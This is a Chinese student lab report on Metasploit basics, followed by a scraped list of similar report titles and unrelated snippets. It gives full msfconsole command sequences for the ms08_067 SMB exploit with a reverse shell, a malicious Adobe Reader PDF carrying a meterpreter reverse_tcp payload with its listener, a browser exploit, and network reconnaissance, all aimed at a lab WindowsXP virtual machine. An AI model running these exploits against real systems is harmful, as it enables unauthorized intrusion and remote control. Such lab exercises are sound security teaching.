20155328 网络攻防 实验五:MSF基础应用
20155328 网络攻防 实验五:MSF基础应用
实践内容及过程记录
一、Windows服务渗透攻击————ms08_067
攻击机:kali
靶机:WindowsXP(英文版)
第一步,分别查看攻击机和靶机的IP。
在kali终端中,输入msfconsole
进入msf控制台,依次输入以下指令:
use exploit/windows/smb/ms08_067_netapiuse exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
set LHOST 192.168.127.138
set LPORT 5328
set RHOST 192.168.127.139
set target 0
exploit
攻击成功,可以看到已经获取了靶机的系统信息:
二、浏览器渗透攻击————ms11_103
在kali终端输入msfconsole打开msf控制台,输入以下参数:
被攻击的主机可以看到网页无法正常打开:
回到kali,输入以下指令:
sessions
sessions -i n//n为显示的最大进程号
可以看到攻击成功了。
三、针对Adobe Reader的渗透攻击
在kali中进入msf控制台,输入以下指令:
use windows/fileformat/adobe)cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
set FILENAME 20155328.pdf
exploit
生成了PDF:
将生成的PDF拷贝到靶机上。
kali中输入back,进入监听模块,输入以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
exploit
然后在靶机上打开PDF:
攻击机显示攻击成功:
四、应用Aux辅助模块
1.browser_info
在kali终端中输入show auxiliary
,查看aux中都有哪些模块,最后选中gather/browser_info。
进入到msf控制台后,依次输入以下命令:
use auxiliary/gather_browser_info
set SRVHOST 192.168.127.138 //kali的IP
set SRVPORT 5328
exploit
可以看到生成了URL,且Server Start。
复制链接,在靶机(WindowsXP)中进行访问:
回到kali,可以看到已经获取了靶机访问该url的浏览器信息。
2.arp_sweep
先在kali终端中输入以下命令,手动创建一个msf所需的数据库:
service postgresql start
msfdb start
再输入msfconsole
开启msf,输入命令use auxiliary/scanner/discovery/arp_sweep
进入模块,设置参数:(RHOSTS填写kali所在的网段)
设定好了以后输入run
,可以看到除了自己主机IP外,还有三个其他IP:
在msf中输入命令db_nmap -O 192.168.127.139
(靶机IP),可以看到开启的端口号即靶机的目标操作系统。
基础问题回答
用自己的话解释什么是exploit,payload,encode。
exploit:利用漏洞或一切可利用的东西进行获取用户权限、篡改文件信息等操作。
payload:在靶机上执行的一段代码,可以反弹连接。
encode:对特征码进行编码,改变特征码。
实践总结与体会
这次实验主要是做的小模块比较多,感觉还。。挺厉害的。。再接再厉吧。
20155328 网络攻防 实验五:MSF基础应用的更多相关文章
- 20155201 网络攻防技术 实验五 MSF基础应用
20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ...
- 20155235 《网络攻防》 实验五 MSF基础应用
20155235 <网络攻防> 实验五 MSF基础应用 实验内容 一个主动攻击实践,如ms08_067; (1分) 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击 ...
- 2017-2018-2 20155225《网络对抗技术》实验五 MSF基础应用
2017-2018-2 20155225<网络对抗技术>实验五 MSF基础应用 ms08_067 用search命令,搜索与ms08_067相关的模块,如图: 找到了对应的攻击模块expl ...
- 20155313 杨瀚 《网络对抗技术》实验五 MSF基础应用
20155313 杨瀚 <网络对抗技术>实验五 MSF基础应用 一.实验目的 本实验目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动 ...
- 20145236《网络攻防》Exp5 MSF基础应用
20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...
- 20155226《网络攻防》 Exp5 MSF基础应用
20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...
- 20155301 《网络攻防》 Exp5 MSF基础应用
20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标 ...
- 20155318 《网络攻防》Exp5 MSF基础应用
20155318 <网络攻防>Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传 ...
- 20155321 《网络攻防》 Exp5 MSF基础应用
20155321 <网络攻防> Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode 关于exploit,我觉得exploit是利用一些工具 ...
随机推荐
- art-template模板应用
<!DOCTYPE html> <html> <head lang="en"> <meta charset="UTF-8&quo ...
- 闲聊jQuery(一)
Write less, do more. 这便是jQuery的宗旨!jQuery,一个高效.精简并且功能丰富的 JavaScript 工具库. 想必,对于每一个前端开发者,一定用过jQuery吧!俗话 ...
- Python图像识别(聚类)
# -*- coding: utf-8 -*- """ Created on Fri Sep 21 15:37:26 2018 @author: zhen "& ...
- Visual Studio Code配置Python环境
安装环境python环境变量,这个就不写了,这类文章一抓一大把,这类就省略了······· 在Visal Studil Code中配置python环境,其实跟我的上一篇文章一样,如图: 这里有两个选择 ...
- C# WinForm中添加用户控件
转:https://blog.csdn.net/haelang/article/details/40681003 有的时候我们需要频繁使用一些系统默认工具的组合,那么就可以使用自定义用户控件. 起一个 ...
- 使用 Azure CLI 创建 Windows 虚拟机
Azure CLI 用于从命令行或脚本创建和管理 Azure 资源. 本指南详细介绍如何使用 Azure CLI 部署运行 Windows Server 2016 的虚拟机. 部署完成后,我们连接到服 ...
- Jmeter用于接口测试中【接口耦合关联的实现】
Jmeter用于接口测试时,后一个接口经常需要用到前一次接口返回的结果,应该如何获取前一次请求的结果值,应用于后一个接口呢,拿一个登录的例子来说明如何获取. 1.打开jmeter, 使用的3.3的版本 ...
- python 3.6 的 venv 模块
今天,在在使用 pycharm 的使用,进行创建 python的时候,发现使用默认的创建的选项使用的python 3环境 .而我系统默认的python环境是 python 2.7 环境:这就引起了我的 ...
- 点击一个div ,把div里的某个参数的值,传到一个input里面
- 运行结果出现Process finished with exit code 0
表示程序正常执行完毕并退出. 可以科普一下exit code,在大部分编程语言中都适用 exit code 0表示程序执行成功,正常退出 exit code 1表示执行过程中遇到了某些问题或者错误,非 ...